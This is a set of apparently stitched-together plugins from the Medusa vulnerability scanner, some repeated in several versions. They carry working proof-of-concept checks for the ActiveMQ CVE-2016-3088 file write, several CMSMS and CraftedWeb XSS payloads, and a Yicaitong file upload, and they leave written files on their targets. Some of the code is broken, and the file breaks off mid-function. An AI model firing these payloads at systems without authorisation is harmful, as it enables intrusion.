def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check *Url* for the ActiveMQ fileserver PUT write (CVE-2016-3088).

    PUTs a random marker to ``/fileserver/Medusa.txt`` over one session,
    then GETs the same path. A 204 on the PUT plus the marker in the GET
    body is reported through VulnerabilityDetails and WriteFile. Any
    exception is caught and routed to ErrorHandling/ErrorLog. The marker
    file is not removed afterwards.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        Headers: request headers; mutated in place (``Connection: close``).
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    # NOTE(review): sibling plugins call ClassCongregation.UrlProcessing().result(Url);
    # confirm this bare name is imported in this module, otherwise NameError is raised.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
        PayloadCode = ClassCongregation.randoms().result(50)+'@Medusa'  # random marker with a fixed suffix
        Headers["Connection"]="close"  # mutates the caller's dict
        s = requests.session()  # same session for the PUT and the verifying GET
        resp = s.put(PayloadUrl, data=PayloadCode, headers=Headers, proxies=proxies,timeout=3,verify=False)
        code = resp.status_code
        resp2=s.get(PayloadUrl, headers=Headers,proxies=proxies, timeout=3).text
        # Both conditions must hold: the write was accepted and the marker reads back.
        if code==204 and resp2.find(PayloadCode)!=-1:
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: network errors, NameError and parsing errors all end up in the error log.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# call the log-writing class; return value is unused
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php" data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert({})%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''.format( RD) payload_url = url + payload resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '''<a href="$("<img/src='x'/onerror=alert()>'''.format( RD)) != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check for a stored XSS in the CMSMS admin site-preferences page.

    POSTs a site-preferences form to ``/cmsms2.2.7/admin/siteprefs.php``
    and reports a finding when the response is 200 and contains the
    random string ``RD``. Exceptions go to ErrorHandling/ErrorLog.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        Headers: request headers passed through unchanged.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # NOTE(review): this literal is never passed through .format(), so the "{}" is sent
        # verbatim and RD is not part of the request; the con.find(RD) test below can only
        # succeed if the page already contains that random string.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# call the log-writing class; return value is unused
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check for a stored XSS in the CMSMS admin site-preferences page.

    Same request as the Headers-based variant, but builds its own header
    dict around *RandomAgent*. POSTs to ``/cmsms2.2.7/admin/siteprefs.php``
    and reports when the response is 200 and contains ``RD``.
    Exceptions go to ErrorHandling/ErrorLog.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # NOTE(review): this literal is never passed through .format(), so the "{}" is sent
        # verbatim and RD is not part of the request; con.find(RD) below can only succeed
        # if the page already contains that random string.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# call the log-writing class; return value is unused
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: PayloadPoc = "/fileserver/Medusa.txt" PayloadUrl = url + PayloadPoc PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa' Headers["Connection"] = "close" s = requests.session() resp = s.put(PayloadUrl, data=PayloadCode, headers=Headers, proxies=proxies, timeout=3, verify=False) code = resp.status_code resp2 = s.get(PayloadUrl, headers=Headers, proxies=proxies, timeout=3).text if code == 204 and resp2.find(PayloadCode) != -1: Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format( url, PayloadUrl, PayloadCode) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format( RD) payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert({})</script>&m1_filename=Adherents-0.2.6.xml".format( RD) payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check for a reflected XSS in CraftedWeb's notice page.

    Builds its own header dict around *RandomAgent*, GETs
    ``/aasp_includes/pages/notice.php`` with a random marker in ``e`` and
    reports a finding when the response is 200 and contains
    ``<script>alert(RD)</script>``. Exceptions go to ErrorHandling/ErrorLog.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        # The string searched for differs from the one sent; the page is expected to re-emit it in this form.
        if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 :
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# call the log-writing class; return value is unused
def medusa(Url,RandomAgent,Token,proxies=None):
    """Check for a reflected XSS in the CMSMS installer session test.

    POSTs a ``default_cms_lang`` value carrying a random marker to
    ``/k/cms/cmsmadesimple/install/index.php?sessiontest=1`` and reports
    a finding when the response is 200 and contains ``RD``. Older
    signature: takes *Token* explicitly instead of ``**kwargs`` and logs
    errors with ``ErrorLog().Write(url, plugin_name)``.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: value used for the User-Agent header.
        Token: passed as the third argument to VulnerabilityDetails.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(payload_url, data=data,headers=headers,proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # NOTE(review): unlike the sibling plugins, the exception object itself is not
        # written to the error log here, only the URL and plugin name.
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log-writing class with the URL and the failing plugin name
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check *Url* for the ActiveMQ fileserver PUT write (CVE-2016-3088).

    Builds its own header dict around *RandomAgent*, PUTs a random marker
    to ``/fileserver/Medusa.txt`` over one session and GETs it back; a 204
    on the PUT plus the marker in the GET body is reported through
    VulnerabilityDetails and WriteFile. Exceptions go to
    ErrorHandling/ErrorLog. The marker file is not removed afterwards.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    # NOTE(review): sibling plugins call ClassCongregation.UrlProcessing().result(Url);
    # confirm this bare name is imported in this module, otherwise NameError is raised.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = scheme + '://' + url + ':' + str(port) + PayloadPoc
        PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa'  # random marker with a fixed suffix
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'User-Agent': RandomAgent,
            'Connection': 'close',
        }
        s = requests.session()  # same session for the PUT and the verifying GET
        resp = s.put(PayloadUrl, data=PayloadCode, headers=headers, proxies=proxies, timeout=3, verify=False)
        code = resp.status_code
        resp2 = s.get(PayloadUrl, headers=headers, proxies=proxies, timeout=3).text
        # Both conditions must hold: the write was accepted and the marker reads back.
        if code == 204 and resp2.find(PayloadCode) != -1:
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format( url, PayloadUrl, PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log-writing class; return value is unused
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD=ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD) payload_url = url + payload resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check for a reflected XSS in the CMSMS installer session test.

    POSTs a ``default_cms_lang`` value carrying a random marker to
    ``/k/cms/cmsmadesimple/install/index.php?sessiontest=1`` and reports
    a finding when the response is 200 and contains ``RD``. Exceptions
    go to ErrorHandling/ErrorLog.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        Headers: request headers passed through unchanged.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format( RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(RD) != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log-writing class; return value is unused
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check for a reflected XSS in CraftedWeb's notice page.

    GETs ``/aasp_includes/pages/notice.php`` with a random marker in the
    ``e`` parameter and reports a finding when the response is 200 and
    contains ``<script>alert(RD)</script>``. Exceptions go to
    ErrorHandling/ErrorLog.

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        Headers: request headers passed through unchanged.
        proxies: proxy spec, resolved by ClassCongregation.Proxies.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format( RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        # The string searched for differs from the one sent; the page is expected to re-emit it in this form.
        if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log-writing class; return value is unused
# Leftover commented-out code and developer reminders from the original file.
# # except:
# #     pass
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# if __name__ == '__main__':
#     UrlList = []
#     ThredList = []
#     la = []
#     with open("6.txt", 'r', encoding='UTF-8') as f:
#         line = f.readline()
#         while line:
#             ThredList.append(threading.Thread(target=medusa, args=(line.strip("\r\n",), "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",), kwargs={"Uid": "Ayanami Rei", "Sid": "Soryu Asuka Langley"}))
#             line = f.readline()
#     for t in ThredList:  # start the threads in the list
#         t.start()
#     for p in ThredList:  # wait for the threads in the list
#         p.join()
# medusa("", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36")
#
# Development commands noted by the author:
# celery -A Web.Workbench.Tasks worker --loglevel=info --pool=solo
# python3 manage.py runserver 0.0.0.0:9999
# mitmdump -s ProxyServer.py --proxyauth any --listen-host "0.0.0.0" --listen-port 9747
# .\redis-server.exe redis.windows.conf
# git commit -m "v0.82.3:palm_tree:"
# find . -type d -name '__pycache__' | xargs rm -rf

import ClassCongregation

# Ad-hoc smoke check of the random-string helper: print 99999 samples of length 10.
for _ in range(1, 100000):
    print(ClassCongregation.randoms().result(10))
def medusa(**kwargs) -> None:
    """Check for an unrestricted upload in the Yicaitong e-procurement editor.

    POSTs a hand-built multipart body containing a random marker to
    ``/library/editornew/Editor/img_save.asp``, extracts the stored file
    name with a ``getimg('<digits>.cer')`` regex, GETs it back from
    ``/library/editornew/Editor/NewImage/`` and reports a finding when that
    second response is 200 and contains the marker (case-insensitive).
    Exceptions go to ErrorHandling/ErrorLog. The uploaded file is not
    removed afterwards.

    Keyword Args:
        Url: base URL the payload paths are appended to.
        Headers: request headers; mutated in place (Content-Type, Accept).
        Proxies: proxy spec passed straight to requests.
    """
    url = kwargs.get("Url") # fetch the Url argument
    Headers = kwargs.get("Headers") # fetch the request headers
    proxies = kwargs.get("Proxies") # fetch the proxies argument
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = url + payload
        # NOTE(review): this multipart body is shown here on a single line; the original
        # source presumably had line breaks between the parts — verify against the repository.
        data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD).encode('utf-8')
        # Both assignments mutate the caller's dict, not a copy.
        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group( 1)
            resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # The uploaded content is only the random marker RD, used to confirm the write.
            if code2 == 200 and con2.lower().find(RD) != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails( _t.info, resp2, **kwargs).Write() # pass the url and the scan result
                ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file: url is the target used as the file name, Medusa is the result
    except Exception as e:
        # Broad catch: every failure is logged, none propagates to the caller.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log-writing class; return value is unused
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check for an unrestricted upload in the Yicaitong e-procurement editor.

    Builds its own header dict around *RandomAgent*, POSTs a hand-built
    multipart body containing a random marker to
    ``/library/editornew/Editor/img_save.asp``, extracts the stored file
    name with a ``getimg('<digits>.cer')`` regex and fetches it back from
    ``/library/editornew/Editor/NewImage/``; a 200 containing the marker
